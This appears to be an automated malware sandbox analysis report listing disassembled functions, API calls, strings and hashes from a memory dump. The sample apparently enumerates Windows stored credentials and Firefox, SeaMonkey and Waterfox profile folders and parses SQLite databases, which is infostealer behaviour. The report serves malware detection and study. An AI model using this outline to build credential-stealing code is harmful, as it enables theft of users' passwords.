                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                • memset.MSVCRT ref: 0040BE91
                                                                                                                                                • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 697348961-0
                                                                                                                                                • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00403CBF
                                                                                                                                                • memset.MSVCRT ref: 00403CD4
                                                                                                                                                • memset.MSVCRT ref: 00403CE9
                                                                                                                                                • memset.MSVCRT ref: 00403CFE
                                                                                                                                                • memset.MSVCRT ref: 00403D13
                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                • memset.MSVCRT ref: 00403DDA
                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                                                                                • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                • API String ID: 1829478387-11920434
                                                                                                                                                • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00403E50
                                                                                                                                                • memset.MSVCRT ref: 00403E65
                                                                                                                                                • memset.MSVCRT ref: 00403E7A
                                                                                                                                                • memset.MSVCRT ref: 00403E8F
                                                                                                                                                • memset.MSVCRT ref: 00403EA4
                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                • memset.MSVCRT ref: 00403F6B
                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                                                                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                • API String ID: 1829478387-2068335096
                                                                                                                                                • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00403FE1
                                                                                                                                                • memset.MSVCRT ref: 00403FF6
                                                                                                                                                • memset.MSVCRT ref: 0040400B
                                                                                                                                                • memset.MSVCRT ref: 00404020
                                                                                                                                                • memset.MSVCRT ref: 00404035
                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                • memset.MSVCRT ref: 004040FC
                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                                                                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                • API String ID: 1829478387-3369679110
                                                                                                                                                • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
                                                                                                                                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                • API String ID: 3510742995-2641926074
                                                                                                                                                • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                Function 0041837F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                • free.MSVCRT ref: 0041848B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateErrorFileLastfree
                                                                                                                                                • String ID: |A
                                                                                                                                                • API String ID: 981974120-1717621600
                                                                                                                                                • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                • memset.MSVCRT ref: 004033B7
                                                                                                                                                • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                • String ID: $0.@
                                                                                                                                                • API String ID: 2758756878-1896041820
                                                                                                                                                • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2941347001-0
                                                                                                                                                • Opcode ID: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                                                                                                • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                • Opcode Fuzzy Hash: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                                                                                                • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00403C09
                                                                                                                                                • memset.MSVCRT ref: 00403C1E
                                                                                                                                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memsetwcscat$wcscpywcslen
                                                                                                                                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                • API String ID: 2489821370-1174173950
                                                                                                                                                • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040A824
                                                                                                                                                • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 669240632-0
                                                                                                                                                • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • wcschr.MSVCRT ref: 00414458
                                                                                                                                                • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                • String ID: "%s"
                                                                                                                                                • API String ID: 1343145685-3297466227
                                                                                                                                                • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                • API String ID: 1714573020-3385500049
                                                                                                                                                • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004087D6
                                                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                • memset.MSVCRT ref: 00408828
                                                                                                                                                • memset.MSVCRT ref: 00408840
                                                                                                                                                • memset.MSVCRT ref: 00408858
                                                                                                                                                • memset.MSVCRT ref: 00408870
                                                                                                                                                • memset.MSVCRT ref: 00408888
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2911713577-0
                                                                                                                                                • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                                                • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                                                • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcmp
                                                                                                                                                • String ID: @ $SQLite format 3
                                                                                                                                                • API String ID: 1475443563-3708268960
                                                                                                                                                • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmpqsort
                                                                                                                                                • String ID: /nosort$/sort
                                                                                                                                                • API String ID: 1579243037-1578091866
                                                                                                                                                • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040E60F
                                                                                                                                                • memset.MSVCRT ref: 0040E629
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
